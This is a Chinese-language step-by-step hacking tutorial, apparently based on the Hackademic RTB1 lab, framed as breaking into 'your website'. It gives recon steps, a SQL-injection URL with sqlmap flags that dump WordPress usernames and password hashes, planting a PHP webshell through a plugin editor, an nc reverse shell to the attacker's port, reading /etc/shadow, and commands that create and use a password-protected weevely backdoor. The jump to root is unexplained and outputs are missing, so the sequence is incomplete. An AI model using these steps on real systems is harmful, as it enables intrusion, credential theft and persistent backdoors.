現在我們獲取了網站伺服器的IP地址為:173.236.138.113
尋找同一伺服器上的其它網站,我們使用sameip.org.
我們需要關於你網站的以下資訊:
讓我們開始找你網站的DNS記錄,我們用who.is來完成這一目標.
我們發現你的DNS記錄如下
讓我們來確定web伺服器的類型
我們現在已經獲取了你的網站域名的注冊資訊,包括你的重要資訊等.
我們可以通過backtrack5中的whatweb來獲取你的網站伺服器作業系統類型和伺服器的版本.
我們發現你的網站使用了著名的php整站程式wordpress,伺服器的的系統類型為FedoraLinux,Web伺服器版本Apache 2.2.15.繼續查看網站伺服器開放的端口,用滲透測試工具nmap:
1-Find services that run on server(查看伺服器上運行的服務)
2-Find server OS(查看作業系統版本)
我們也會用到Backtrack 5 R1中的W3AF 工具:
root@bt:/pentest/web/w3af#./w3af_gui
我們輸入要檢測的網站地址,選擇完整的安全審計選項.
稍等一會,你將會看到掃描結果.
發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
我們通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.
Using sqlmap with –u url
過一會你會看到
輸入N按回車鍵繼續
我們發現你的網站存在mysql顯錯注入,mysql數據庫版本是5.0. 我們通過加入參數”-dbs”來嘗試采集數據庫名.
發現三個數據庫,接下來通過參數”-D wordpress -tables”來查看wordpress數據庫的所有表名
通過參數“-T wp_users –columns ”來查看wp_users表中的資料欄.
接下來猜解資料欄user_login和user_pass的值.用參數”-C user_login,user_pass–dump”
我們會發現用戶名和密碼hashes值. 我們需要通過以下在線破解網站來破解密碼hashes
登陸wordpress的後台wp-admin
嘗試上傳php webshell到伺服器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新檔案,然後訪問我們的phpwebshell.
Phpwebshell被解析了,我們可以控制你網站的檔案,但是我們只希望獲得網站伺服器的root權限,來入侵伺服器上其它的網站。
我們用NC來反彈一個shell,首先在我們的電腦上監聽5555端口.
然後在Php webshell上反向連接我們的電腦,輸入你的IP和端口5555.
點擊連接我們會看到
接下來我們嘗試執行一些命令:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(用來顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
(顯示伺服器上當前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(顯示內核版本資訊)
執行完成之後我們輸入id命令
id
我們發現我們已經是root權限了
uid=0(root) gid=0(root)
現在我們可以查看/etc/shadow檔案
cat/etc/shadow
2.用weevely創建一個密碼為koko的php後門
root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
接下來上傳到伺服器之後來使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko
測試我們的hax.php後門
完成,撒花!